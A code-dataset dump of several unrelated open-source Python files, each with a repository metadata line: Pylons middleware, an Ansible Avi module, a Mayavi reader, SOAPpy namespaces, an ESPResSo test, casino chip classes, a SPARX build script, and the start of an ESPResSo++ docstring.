from beaker.middleware import CacheMiddleware, SessionMiddleware
from routes.middleware import RoutesMiddleware
from paste.cascade import Cascade
from paste.registry import RegistryManager
from paste.urlparser import StaticURLParser
from paste.deploy.converters import asbool
from pylons import config
from pylons.error import error_template
from pylons.middleware import error_mapper, ErrorDocuments, ErrorHandler
from pylons.wsgiapp import PylonsApp
from dirac.config.environment import load_environment
def make_app( global_conf, full_stack = True, **app_conf ):
  """Create a Pylons WSGI application and return it

  ``global_conf``
      The inherited configuration for this application. Normally from
      the [DEFAULT] section of the Paste ini file.

  ``full_stack``
      Whether or not this application provides a full WSGI stack (by
      default, meaning it handles its own exceptions and errors).
      Disable full_stack when this application is "managed" by
      another WSGI middleware.

  ``app_conf``
      The application's local configuration. Normally specified in the
      [app:<name>] section of the Paste ini file (where <name>
      defaults to main).
  """
  # Configure the Pylons environment
  load_environment( global_conf, app_conf )

  # The Pylons WSGI app
  # Overload with DIRAC app after the PYTHONPATH has been set
  # (hence the function-local import: it must happen after load_environment).
  from dirac.lib.DiracWebApp import DiracWebApp
  app = DiracWebApp()

  # CUSTOM MIDDLEWARE HERE (filtered by error handling middlewares)
  # NOTE: wrapping order matters — routing/session/cache innermost, error
  # handling around those, static-file cascade outermost.
  app = RoutesMiddleware( app, config['routes.map'] )
  app = SessionMiddleware( app, config )
  app = CacheMiddleware( app, config )

  if asbool( full_stack ):
    # Handle Python exceptions
    app = ErrorHandler( app, global_conf, **config['pylons.errorware'] )

    # Display error documents for 401, 403, 404 status codes (and
    # 500 when debug is disabled)
    app = ErrorDocuments( app, global_conf, mapper = error_mapper, **app_conf )

  # Establish the Registry for this application
  app = RegistryManager( app )

  # Static files
  # NOTE(review): types.ListType/TupleType are Py2-only aliases — this module
  # predates Py3; confirm before porting.
  staticFiles = config['pylons.paths']['static_files']
  cascadeApps = []
  if type( staticFiles ) in ( types.ListType, types.TupleType ):
    for staticFile in staticFiles:
      cascadeApps.append( StaticURLParser( staticFile ) )
  else:
    cascadeApps.append( StaticURLParser( staticFiles ) )
  cascadeApps.extend( [ app ] )
  app = Cascade( cascadeApps )
  return app
| DIRACGrid/DIRACWeb | dirac/config/middleware.py | Python | gpl-3.0 | 2,564 | [
"DIRAC"
] | 2ea85ba099bc7803d0a3ac4a7f90bb4b3be5ec3dfc30cb92b464058f512e5542 |
#!/usr/bin/python
#
# @author: Gaurav Rastogi (grastogi@avinetworks.com)
# Eric Anderson (eanderson@avinetworks.com)
# module_check: supported
# Avi Version: 17.1.1
#
# Copyright: (c) 2017 Gaurav Rastogi, <grastogi@avinetworks.com>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
#
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: avi_cloudconnectoruser
author: Gaurav Rastogi (grastogi@avinetworks.com)
short_description: Module for setup of CloudConnectorUser Avi RESTful Object
description:
- This module is used to configure CloudConnectorUser object
- more examples at U(https://github.com/avinetworks/devops)
requirements: [ avisdk ]
version_added: "2.4"
options:
state:
description:
- The state that should be applied on the entity.
default: present
choices: ["absent", "present"]
avi_api_update_method:
description:
- Default method for object update is HTTP PUT.
- Setting to patch will override that behavior to use HTTP PATCH.
version_added: "2.5"
default: put
choices: ["put", "patch"]
avi_api_patch_op:
description:
- Patch operation to use when using avi_api_update_method as patch.
version_added: "2.5"
choices: ["add", "replace", "delete"]
azure_serviceprincipal:
description:
- Field introduced in 17.2.1.
version_added: "2.5"
azure_userpass:
description:
- Field introduced in 17.2.1.
version_added: "2.5"
name:
description:
- Name of the object.
required: true
private_key:
description:
- Private_key of cloudconnectoruser.
public_key:
description:
- Public_key of cloudconnectoruser.
tenant_ref:
description:
- It is a reference to an object of type tenant.
url:
description:
- Avi controller URL of the object.
uuid:
description:
- Unique object identifier of the object.
extends_documentation_fragment:
- avi
'''
EXAMPLES = """
- name: Create a Cloud connector user that is used for integration into cloud platforms
avi_cloudconnectoruser:
controller: '{{ controller }}'
name: root
password: '{{ password }}'
private_key: |
-----BEGIN RSA PRIVATE KEY-----
-----END RSA PRIVATE KEY-----'
public_key: 'ssh-rsa ...'
tenant_ref: admin
username: '{{ username }}'
"""
RETURN = '''
obj:
description: CloudConnectorUser (api/cloudconnectoruser) object
returned: success, changed
type: dict
'''
from ansible.module_utils.basic import AnsibleModule
try:
from ansible.module_utils.network.avi.avi import (
avi_common_argument_spec, HAS_AVI, avi_ansible_api)
except ImportError:
HAS_AVI = False
def main():
    """Ansible module entry point: declare the cloudconnectoruser argument
    spec and delegate CRUD handling to the shared Avi API helper."""
    argument_specs = dict(
        state=dict(default='present',
                   choices=['absent', 'present']),
        avi_api_update_method=dict(default='put',
                                   choices=['put', 'patch']),
        avi_api_patch_op=dict(choices=['add', 'replace', 'delete']),
        azure_serviceprincipal=dict(type='dict',),
        azure_userpass=dict(type='dict',),
        name=dict(type='str', required=True),
        private_key=dict(type='str', no_log=True,),
        public_key=dict(type='str',),
        tenant_ref=dict(type='str',),
        url=dict(type='str',),
        uuid=dict(type='str',),
    )
    # Shared controller/credential options (controller, username, password, ...)
    argument_specs.update(avi_common_argument_spec())
    module = AnsibleModule(
        argument_spec=argument_specs, supports_check_mode=True)
    if not HAS_AVI:
        return module.fail_json(msg=(
            'Avi python API SDK (avisdk>=17.1) is not installed. '
            'For more details visit https://github.com/avinetworks/sdk.'))
    # 'private_key' is excluded from the change-comparison (sensitive field).
    return avi_ansible_api(module, 'cloudconnectoruser',
                           set(['private_key']))


if __name__ == '__main__':
    main()
| alexlo03/ansible | lib/ansible/modules/network/avi/avi_cloudconnectoruser.py | Python | gpl-3.0 | 4,187 | [
"VisIt"
] | 7011fb21fd659ebf76eb8773fa4688a9e1d796e2e594d3aede2226716513f72d |
"""A Chaco file reader.
"""
# Author: Suyog Dutt Jain <suyog.jain@aero.iitb.ac.in>
# Copyright (c) 2009, Enthought, Inc.
# License: BSD Style.
# Enthought library imports.
from traits.api import Instance, Str
from traitsui.api import View, Group, Item
from tvtk.api import tvtk
# Local imports.
from mayavi.core.source import Source
from mayavi.core.pipeline_info import PipelineInfo
########################################################################
# `ChacoReader` class
########################################################################
class ChacoReader(Source):
    """A Chaco reader.

    Mayavi pipeline source wrapping tvtk.ChacoReader; produces an
    unstructured grid from a set of Chaco files sharing a base name.
    """

    # The version of this class.  Used for persistence.
    __version__ = 0

    base_name = Str('', desc='basename of the Chaco files')

    # The VTK data file reader.
    reader = Instance(tvtk.ChacoReader, args=(), allow_none=False,
                      record=True)

    # Information about what this object can produce.
    output_info = PipelineInfo(datasets=['unstructured_grid'])

    ########################################
    # View related code.

    # Our view.
    view = View(Group(Item(name='reader', style='custom',
                           resizable=True),
                      show_labels=False),
                resizable=True)

    ######################################################################
    # `FileDataSource` interface
    ######################################################################
    def __init__(self, base_name='', configure=True, **traits):
        # By default pop up a modal trait editor so the user can pick the
        # base name; pass configure=False for scripted use.
        super(ChacoReader, self).__init__(**traits)
        if configure:
            self.reader.edit_traits(kind='livemodal')
        self.base_name = self.reader.base_name

    def update(self):
        # No-op until a base name has been chosen.
        if len(self.base_name) == 0:
            return
        self.reader.update()
        self.render()

    def has_output_port(self):
        """ Return True as the reader has output port."""
        return True

    def get_output_object(self):
        """ Return the reader output port."""
        return self.reader.output_port

    ######################################################################
    # Non-public interface
    ######################################################################
    def _base_name_changed(self, value):
        # Traits static notification handler: push the new base name into
        # the tvtk reader and refresh its output.
        if len(value) == 0:
            return
        else:
            self.reader.base_name = value
        self._update_reader_output()

    def _update_reader_output(self):
        self.reader.update()
        self.reader.update_information()
        self.reader.on_trait_change(self.render)
        self.outputs = [self.reader.output]
        self.data_changed = True
| dmsurti/mayavi | mayavi/sources/chaco_reader.py | Python | bsd-3-clause | 2,647 | [
"Mayavi",
"VTK"
] | 55b6088d116a6eeae75101c2156221760942f4fda3a27333cb1d2d8e068e96f8 |
from __future__ import nested_scopes
"""
################################################################################
#
# SOAPpy - Cayce Ullman (cayce@actzero.com)
# Brian Matthews (blm@actzero.com)
# Gregory Warnes (Gregory.R.Warnes@Pfizer.com)
# Christopher Blunck (blunck@gst.com)
#
################################################################################
# Copyright (c) 2003, Pfizer
# Copyright (c) 2001, Cayce Ullman.
# Copyright (c) 2001, Brian Matthews.
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# Neither the name of actzero, inc. nor the names of its contributors may
# be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
################################################################################
"""
ident = '$Id: NS.py 1468 2008-05-24 01:55:33Z warnes $'
from version import __version__
##############################################################################
# Namespace Class
################################################################################
def invertDict(dict):
    """Return a new dictionary with the keys and values of *dict* swapped.

    When several keys share the same value, the last one visited wins.
    """
    inverted = {}
    for key, value in dict.items():
        inverted[value] = key
    return inverted
class NS:
    """Namespace constants used when serializing/deserializing SOAP messages.

    Holds the canonical URIs for the SOAP envelope/encoding and the three
    generations of XML Schema (1999/2000/2001), the tag prefixes used in
    generated messages, and lookup tables mapping between the two.

    This class is a pure namespace and must never be instantiated.
    """
    XML = "http://www.w3.org/XML/1998/namespace"

    ENV = "http://schemas.xmlsoap.org/soap/envelope/"
    ENC = "http://schemas.xmlsoap.org/soap/encoding/"

    XSD = "http://www.w3.org/1999/XMLSchema"
    XSD2 = "http://www.w3.org/2000/10/XMLSchema"
    XSD3 = "http://www.w3.org/2001/XMLSchema"

    XSD_L = [XSD, XSD2, XSD3]
    EXSD_L= [ENC, XSD, XSD2, XSD3]

    XSI = "http://www.w3.org/1999/XMLSchema-instance"
    XSI2 = "http://www.w3.org/2000/10/XMLSchema-instance"
    XSI3 = "http://www.w3.org/2001/XMLSchema-instance"
    XSI_L = [XSI, XSI2, XSI3]

    URN = "http://soapinterop.org/xsd"

    # For generated messages
    XML_T = "xml"
    ENV_T = "SOAP-ENV"
    ENC_T = "SOAP-ENC"
    XSD_T = "xsd"
    XSD2_T= "xsd2"
    XSD3_T= "xsd3"
    XSI_T = "xsi"
    XSI2_T= "xsi2"
    XSI3_T= "xsi3"
    URN_T = "urn"

    # prefix -> URI, and the inverse for lookups while parsing.
    NSMAP = {ENV_T: ENV, ENC_T: ENC, XSD_T: XSD, XSD2_T: XSD2,
             XSD3_T: XSD3, XSI_T: XSI, XSI2_T: XSI2, XSI3_T: XSI3,
             URN_T: URN}
    NSMAP_R = invertDict(NSMAP)

    # schema year -> (xsd prefix, xsi prefix), plus the inverse.
    STMAP = {'1999': (XSD_T, XSI_T), '2000': (XSD2_T, XSI2_T),
             '2001': (XSD3_T, XSI3_T)}
    STMAP_R = invertDict(STMAP)

    def __init__(self):
        # BUG FIX: the original used the Python 2 statement form
        # ``raise Error, "Don't instantiate this"`` where ``Error`` was
        # never defined anywhere in this module, so instantiation died
        # with a NameError (and the statement is a SyntaxError on
        # Python 3). Raise a well-defined exception instead.
        raise TypeError("Don't instantiate this")
| nzsquirrell/p2pool-myriad | oldstuff/SOAPpy/NS.py | Python | gpl-3.0 | 3,724 | [
"Brian"
] | 7187143df3653840e54c01ca340fee44ebd029814e1bdbd3b69317a710bbcdc1 |
#
# Copyright (C) 2013,2014 The ESPResSo project
#
# This file is part of ESPResSo.
#
# ESPResSo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ESPResSo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Tests particle property setters/getters
import unittest as ut

import numpy as np

import espressomd
from espressomd.interactions import (GenericLennardJonesInteraction,
                                     LennardJonesInteraction)
class Non_bonded_interactionsTests(ut.TestCase):
    """Round-trip tests: set non-bonded interaction parameters on the
    espresso system and verify that reading them back returns the same
    values."""
    # def __init__(self,particleId):
    #    self.pid=particleId

    # Handle to espresso system (class attribute: one system shared by all
    # generated test methods).
    es = espressomd.System()

    def intersMatch(self, inType, outType, inParams, outParams):
        """Check, if the interaction type set and gotten back as well as the bond
        parameters set and gotten back match. Only check keys present in
        inParams.
        """
        if inType != outType:
            print("Type mismatch:", inType, outType)
            return False

        for k in inParams.keys():
            if k not in outParams:
                print(k, "missing from returned parameters")
                return False

            if outParams[k] != inParams[k]:
                print("Mismatch in parameter ", k, inParams[k], outParams[k])
                return False

        return True

    # NOTE: deliberately takes no `self` -- this is invoked at
    # class-definition time below as a plain function whose return value
    # (a closure) becomes a bound test method.
    def generateTestForNon_bonded_interaction(_partType1, _partType2, _interClass, _params, _interName):
        """Generates test cases for checking interaction parameters set and gotten back
        from Es actually match. Only keys which are present in _params are checked
        1st and 2nd arg: Particle type ids to check on
        3rd: Class of the interaction to test, ie.e, FeneBond, HarmonicBond
        4th: Interaction parameters as dictionary, i.e., {"k"=1.,"r_0"=0.
        5th: Name of the interaction property to set (i.e. "lennardJones")
        """
        # Capture the arguments in locals so the closure below keeps its
        # own copy for each generated test.
        partType1 = _partType1
        partType2 = _partType2
        interClass = _interClass
        params = _params
        interName = _interName

        def func(self):
            # This code is run at the execution of the generated function.
            # It will use the state of the variables in the outer function,
            # which was there, when the outer function was called
            # Set parameters
            getattr(self.es.non_bonded_inter[partType1, partType2], interName).set_params(
                **params)
            # Read them out again
            outInter = getattr(
                self.es.non_bonded_inter[partType1, partType2], interName)
            outParams = outInter.get_params()

            self.assertTrue(self.intersMatch(interClass, type(outInter), params, outParams), interClass(
                **params).type_name() + ": value set and value gotten back differ for particle types " + str(partType1) + " and " + str(partType2) + ": " + params.__str__() + " vs. " + outParams.__str__())

        return func

    # Generated test methods (bound at class-definition time).
    test_lj1 = generateTestForNon_bonded_interaction(
        0, 0, LennardJonesInteraction,
        {"epsilon": 1., "sigma": 2., "cutoff": 3.,
         "shift": 4., "offset": 5., "min": 7.},
        "lennard_jones")
    test_lj2 = generateTestForNon_bonded_interaction(
        0, 0, LennardJonesInteraction,
        {"epsilon": 1.3, "sigma": 2.2, "cutoff": 3.4,
         "shift": 4.1, "offset": 5.1, "min": 7.1},
        "lennard_jones")
    # NOTE(review): test_lj3 uses exactly the same parameters as test_lj2;
    # possibly a copy/paste oversight -- confirm whether distinct values
    # were intended.
    test_lj3 = generateTestForNon_bonded_interaction(
        0, 0, LennardJonesInteraction,
        {"epsilon": 1.3, "sigma": 2.2, "cutoff": 3.4,
         "shift": 4.1, "offset": 5.1, "min": 7.1},
        "lennard_jones")
    test_ljgen1 = generateTestForNon_bonded_interaction(
        0, 0, GenericLennardJonesInteraction,
        {"epsilon": 1., "sigma": 2., "cutoff": 3., "shift": 4., "offset": 5.,
         "e1": 7, "e2": 8, "b1": 9., "b2": 10., "lambda": 11., "delta": 12.},
        "generic_lennard_jones")
    test_ljgen2 = generateTestForNon_bonded_interaction(
        0, 0, GenericLennardJonesInteraction,
        {"epsilon": 1.1, "sigma": 2.1, "cutoff": 3.1, "shift": 4.1, "offset": 5.1,
         "e1": 71, "e2": 81, "b1": 9.1, "b2": 10.1, "lambda": 11.1, "delta": 12.1},
        "generic_lennard_jones")
    test_ljgen3 = generateTestForNon_bonded_interaction(
        0, 0, GenericLennardJonesInteraction,
        {"epsilon": 1.2, "sigma": 2.2, "cutoff": 3.2, "shift": 4.2, "offset": 5.2,
         "e1": 72, "e2": 82, "b1": 9.2, "b2": 10.2, "lambda": 11.2, "delta": 12.2},
        "generic_lennard_jones")

    def test_forcecap(self):
        # Round-trip the global force cap through its setter/getter.
        self.es.non_bonded_inter.set_force_cap(17.5)
        self.assertEqual(self.es.non_bonded_inter.get_force_cap(), 17.5)
# Allow running this test file directly.
if __name__ == "__main__":
    print("Features: ", espressomd.features())
    ut.main()
| sehrhardt/espresso | testsuite/python/nonBondedInteractions.py | Python | gpl-3.0 | 5,205 | [
"ESPResSo"
] | 6f8f1b95a9d9423902777dd5704601f4cf7fc023bb314c49e1f299a29f1e2d45 |
#Chip.py
#Implements a casino chip, which is used for betting on games.
#Created by: Andrew Davis
#Created on: 1/9/2016
#Open source (MIT license)
#import statements
from Utilities import get_chip_color
#class declaration for Chip superclass
class Chip(object):
    """A Chip is a representation of money in fixed
    denominations, used for betting in a casino."""

    def __init__(self, value):
        # Remember the face value and derive the matching color from it.
        self.__value = value
        self.__color = get_chip_color(value)

    # Human-readable description, e.g. "a red $5 chip".
    def __repr__(self):
        description = "a " + self.__color + " $" + str(self.__value) + " chip"
        return description

    def __str__(self):
        return repr(self)

    # Accessors for the (effectively read-only) attributes.
    def get_value(self):
        return self.__value

    def get_color(self):
        return self.__color

    value = property(get_value)  # read-only 'value' property
    color = property(get_color)  # read-only 'color' property
#class declarations for Chip subclasses
#WhiteChip class - defines a $1 chip
class WhiteChip(Chip):
    """A white chip, worth $1."""
    def __init__(self):
        # Delegate to Chip with this denomination's fixed value.
        Chip.__init__(self, 1)
#RedChip class - defines a $5 chip
class RedChip(Chip):
    """A red chip, worth $5."""
    def __init__(self):
        # Delegate to Chip with this denomination's fixed value.
        Chip.__init__(self, 5)
#GreenChip class - defines a $25 chip
class GreenChip(Chip):
    """A green chip, worth $25."""
    def __init__(self):
        # Delegate to Chip with this denomination's fixed value.
        Chip.__init__(self, 25)
#BlueChip class - defines a $50 chip
class BlueChip(Chip):
    """A blue chip, worth $50."""
    def __init__(self):
        # Delegate to Chip with this denomination's fixed value.
        Chip.__init__(self, 50)
#BlackChip class - defines a $100 chip
class BlackChip(Chip):
    """A black chip, worth $100."""
    def __init__(self):
        # Delegate to Chip with this denomination's fixed value.
        Chip.__init__(self, 100)
#PurpleChip class - defines a $500 chip
class PurpleChip(Chip):
    """A purple chip, worth $500."""
    def __init__(self):
        # Delegate to Chip with this denomination's fixed value.
        Chip.__init__(self, 500)
#YellowChip class - defines a $1000 chip
class YellowChip(Chip):
    """A yellow chip, worth $1000."""
    def __init__(self):
        # Delegate to Chip with this denomination's fixed value.
        Chip.__init__(self, 1000)
#GrayChip class - defines a $5000 chip
class GrayChip(Chip):
    """A gray chip, worth $5000."""
    def __init__(self):
        # Delegate to Chip with this denomination's fixed value.
        Chip.__init__(self, 5000)
| techgineer/casino-sim | src/Chip.py | Python | mit | 2,552 | [
"CASINO"
] | d60f11f990653d8277c9ca89f2ce32e34a92857cfa35e8e931e679f038c464ca |
#! /bin/env python
# Python Distutils setup script for SPARX
# NOTE: this script is written for Python 2 (print statements,
# `raise Exception, "..."`, the `file()` builtin).

# VERSION_NUMBER of SPARX
VERSION_NUMBER = '3.1.3'

# Number of worker threads to compile into the extension (per job).
ENABLE_MULTITREADING = 1
if ENABLE_MULTITREADING:
    import multiprocessing
    # Oversubscribe: two threads per available CPU core.
    NumberOfThread = 2 * multiprocessing.cpu_count()
else:
    NumberOfThread = 1
print 'Number Of Thread =',NumberOfThread

# Some necessary imports
import os, glob
from os.path import exists, realpath, expanduser

# Test for MPI by checking whether mpicc can compile a small test program.
from subprocess import call, Popen, PIPE
if not exists('unit_tests/tmp'):
    os.makedirs('unit_tests/tmp')
HAVE_MPI = (call("mpicc src/mpi-test.c -o unit_tests/tmp/a.out", shell=True, stdout=PIPE, stderr=PIPE) == 0)

# Get svn revision and update VERSION
import time
p = Popen("svnversion", shell=True, stdout=PIPE)
REV = p.communicate()[0].strip()
fo = file("lib/sparx/VERSION", "w")
fo.write("%s (r%s, %s)"%(VERSION_NUMBER,REV, time.asctime()))
fo.close()

##
## Gather information for setting up the package
##
# Get Python paths
import sys
PYINC = sys.prefix+"/include"
PYLIB = sys.prefix+"/lib"
if not (exists(PYINC) and exists(PYLIB)):
    raise Exception, "Cannot locate Python include and lib directories"

# Get NumPy paths
import numpy
NPINC = numpy.get_include()

# MIRIAD support option (enabled when the MIRLIB env variable is set).
MIRSUPPORT = 1 if os.environ.get('MIRLIB') is not None else 0

# Get Miriad paths
if MIRSUPPORT:
    MIRINC = os.getenv("MIRINC")
    MIRLIB = os.getenv("MIRLIB")
    if not (MIRINC and MIRLIB):
        raise Exception, "MIRIAD environment variables not present, cannot locate Miriad headers or libraries"
    MIRINC1 = realpath(MIRINC+"/../pgplot-miriad-remix")
    MIRINC2 = realpath(MIRINC+"/../miriad-c")
    if not (exists(MIRINC1) and exists(MIRINC2)):
        raise Exception, "MIRIAD include paths '%s' and '%s' not present, cannot continue"%(MIRINC1, MIRINC2)

# Check for additional search paths and options specified by the user on
# the command line; recognized flags are consumed from sys.argv so that
# distutils never sees them.
SPARXVERSION='sparx'
SPARX_VERSION='sparx'
USER_INCLUDE = []
USER_LIB = []
args = sys.argv[:]
mpi_libs = ['mpi']
for arg in args:
    if arg.find('--with-include=') == 0:
        USER_INCLUDE += [expanduser(arg.split('=')[1])]
        sys.argv.remove(arg)
    elif arg.find('--with-lib=') == 0:
        USER_LIB += [expanduser(arg.split('=')[1])]
        sys.argv.remove(arg)
    elif arg.find('--no-mpi') == 0:
        HAVE_MPI = False
        sys.argv.remove(arg)
    elif arg.find('--lam') == 0:
        # Link against LAM/MPI instead of the default MPI libraries.
        mpi_libs = ['lammpio', 'mpi', 'lam']
        sys.argv.remove(arg)
    elif arg.find('--mpich') == 0:
        # Link against MPICH (with PGI runtime libraries).
        mpi_libs = ['mpich', 'pgc', 'pgftnrtl', 'pgftnrtl', 'nspgc', 'pgc', 'rt']
        sys.argv.remove(arg)
    elif arg.find('--version') == 0:
        # Suffix the package/extension names with a custom version tag.
        SPARXVERSION += '-'+expanduser(arg.split('=')[1])
        SPARX_VERSION += '_'+expanduser(arg.split('=')[1])
        sys.argv.remove(arg)

# Preprocessor macros passed to the C compiler.
macros = [
    ('NTHREAD', str(NumberOfThread)),
    ('MIRSUPPORT', MIRSUPPORT),
    ('SPARXVERSION', '\"' + SPARXVERSION + '\"' ),
    ('SPARX_VERSION', '\"' + SPARX_VERSION + '\"' ),
]

if not HAVE_MPI:
    print\
'''
NO MPI SUPPORT!
'''
else:
    print\
'''
MPI support available
'''

# Compiler flags
compiler_flags = [
    '-std=c99',
#    '-pedantic',
    '-fshort-enums',
    '-fno-common',
    '-Dinline=',
    '-g',
    '-rdynamic',
    '-O3',
    '-pthread',
#    '-Werror',
    '-Wall',
#    '-W',
    '-Wmissing-prototypes',
    '-Wstrict-prototypes',
    '-Wpointer-arith',
    '-Wcast-qual',
    '-Wcast-align',
    '-Wwrite-strings',
    '-Wnested-externs',
    #'-finline-limit=600',
    #'-fwhole-program',
    '-ftree-vectorize',
]

# Header directories
header_dirs = [
    'src',
    PYINC,
    NPINC,
]+USER_INCLUDE
if MIRSUPPORT:
    header_dirs += [ MIRINC1, MIRINC2]

# Library directories
lib_dirs = [
    PYLIB,
]+USER_LIB
if MIRSUPPORT:
    lib_dirs += [
        MIRLIB
    ]

# Libraries to link to
libs = [
    'X11',
    'm',
    'gsl',
    'gslcblas',
    'fftw3',
    'hdf5',
    'hdf5_hl',
    'cfitsio'
]
if MIRSUPPORT:
    libs += [
        'cpgplot',
        'pgplot',
        'mir',
        'mir_uvio',
        'mir_linpack'
    ]

# Base source files
sources_base = [
    'src/data_structs.c',
    'src/debug.c',
    'src/error.c',
    'src/geometry.c',
    'src/kappa.c',
    'src/memory.c',
    'src/molec.c',
    'src/numerical.c',
    'src/physics.c',
    'src/python-wrappers.c',
    'src/zone.c',
    'src/zone-hdf5.c',
    'src/fits-and-miriad-wrappers.c',
    'src/vtk-wrapper.c',
]
if MIRSUPPORT:
    sources_base += [
        'src/cpgplot-wrappers.c'
    ]

# Base dependencies
depends_base = [
    'src/data_structs.h',
    'src/debug.h',
    'src/error.h',
    'src/geometry.h',
    'src/kappa.h',
    'src/memory.h',
    'src/fits-and-miriad-wrappers.h',
    'src/molec.h',
    'src/numerical.h',
    'src/physics.h',
    'src/python-wrappers.h',
    'src/zone.h',
    'src/zone-hdf5.h',
    'src/vtk-wrapper.h',
]
if MIRSUPPORT:
    depends_base += [
        'src/cpgplot-wrappers.h'
    ]

# SPARX sources files
sources_sparx = [
    'src/sparx-python.c',
    #'src/sparx-test.c',
    'src/sparx-model.c',
    'src/sparx-physics.c',
    'src/sparx-inputs.c',
    'src/sparx-io.c',
    'src/sparx-utils.c',
    'src/sparx-ImageTracing.c',
]

# SPARX dependencies
depends_sparx = ['src/sparx.h']

##
## Distutils setup
##
from distutils.core import setup, Extension
from distutils import ccompiler, unixccompiler
#os.environ["CXX"] = "icc"
#os.environ["CC"] = "icc"

# Things to include if MPI is available
if HAVE_MPI:
    macros += [('HAVE_MPI', None)]
    libs += mpi_libs
    #libs += ['lammpio', 'mpi', 'lam']
    #libs += ['mpich', 'pgc', 'pgftnrtl', 'pgftnrtl', 'nspgc', 'pgc', 'rt']
    #os.environ['CC'] = "mpicc"

# Definition for the _sparx extension module
ext_sparx = Extension( SPARX_VERSION + '._sparx' ,
    sources = sources_base+sources_sparx+[
        'src/sparx-pyext-_sparx.c',
        'src/sparx-task-amc.c',
        'src/sparx-task-telsim.c',
        'src/sparx-task-contobs.c',
        'src/sparx-task-coldens.c',
        'src/sparx-task-visual.c',
        'src/sparx-task-pops2ascii.c',
        #'src/sparx-task-pygrid.c',
        'src/sparx-task-template.c',
    ],
    depends = ['setup.py']+depends_base+depends_sparx,
    extra_compile_args = compiler_flags,
    define_macros = macros,
    include_dirs = header_dirs,
    library_dirs = lib_dirs,
    libraries = libs
)

# The main setup call
setup(
    name = 'sparx',
    version = VERSION_NUMBER,
    author = 'Eric Chung & I-Ta Hsieh',
    author_email = 'schung@asiaa.sinica.edu.tw / ita.hsieh@gmail.com',
    #url = 'http://esclab.tw/wiki/index.php/Category:SPARX',
    url = 'https://github.com/itahsieh/sparx-alpha',
    description = 'SPARX Platform for Astrophysical Radiative Xfer',
    packages = [SPARX_VERSION],
    package_dir = { SPARX_VERSION : "lib/sparx"},
    package_data = { SPARX_VERSION : [
        'data/molec/*.dat', # Molecular data files
        'data/opacity/*.tab', # Opacity data files
        'VERSION', # Program version
    ]},
    ext_modules = [ext_sparx],
    scripts = [
        'bin/presparx', # SPARX preprocessor
        'bin/sparx', # Main sparx command line driver
        'bin/sparx-plot', # Model plotter
        'bin/sparx-plot.py', # Model plotter
        'bin/sparx-validate-dust.py', # Script for validating dust radiative transfer
        'bin/sparx-validate-line.py', # Script for validating line radiative transfer
        'bin/sparx-validate-leiden.py', # Script for validating with the Leiden 2004 benchmark problems
    ],
)
| itahsieh/sparx-alpha | setup.py | Python | gpl-3.0 | 7,096 | [
"VTK"
] | 4d6ba870b8e3f1a578169782604ffbb405cd91c7a5e4ac0d9bf52c8cd438db96 |
# Copyright (C) 2016
# Max Planck Institute for Polymer Research & JGU Mainz
# Copyright (C) 2012,2013
# Max Planck Institute for Polymer Research
# Copyright (C) 2008,2009,2010,2011
# Max-Planck-Institute for Polymer Research & Fraunhofer SCAI
#
# This file is part of ESPResSo++.
#
# ESPResSo++ is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ESPResSo++ is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
r"""
*********************
espressopp.io.DumpXYZ
*********************
* `dump()`
write configuration to trajectory XYZ file. By default filename is ``out.xyz``,
coordinates are folded. DumpXYZ works also for Multiple communicators.
**Properties**
* `filename`
Name of trajectory file. By default trajectory file name is ``out.xyz``
* `unfolded`
False if coordinates are folded, True if unfolded. By default - False
* `append`
True if new trajectory data is appended to existing trajectory file. By default - True
* `length_factor`
If length dimension in current system is nm, and unit is 0.23 nm, for example, then
``length_factor`` should be 0.23
Default: 1.0
* `length_unit`
It is length unit. Can be ``LJ``, ``nm`` or ``A``. By default - ``LJ``
* `store_pids`
True if you want to store pids as fastwritexyz does. False otherwise (standard XYZ)
Default: False
* `store_velocities`
True if you want to store velocities. False otherwise (XYZ doesn't require it)
Default: False
usage:
writing down trajectory
>>> dump_conf_xyz = espressopp.io.DumpXYZ(system, integrator, filename='trajectory.xyz')
>>> for i in range (200):
>>> integrator.run(10)
>>> dump_conf_xyz.dump()
writing down trajectory using ExtAnalyze extension
>>> dump_conf_xyz = espressopp.io.DumpXYZ(system, integrator, filename='trajectory.xyz')
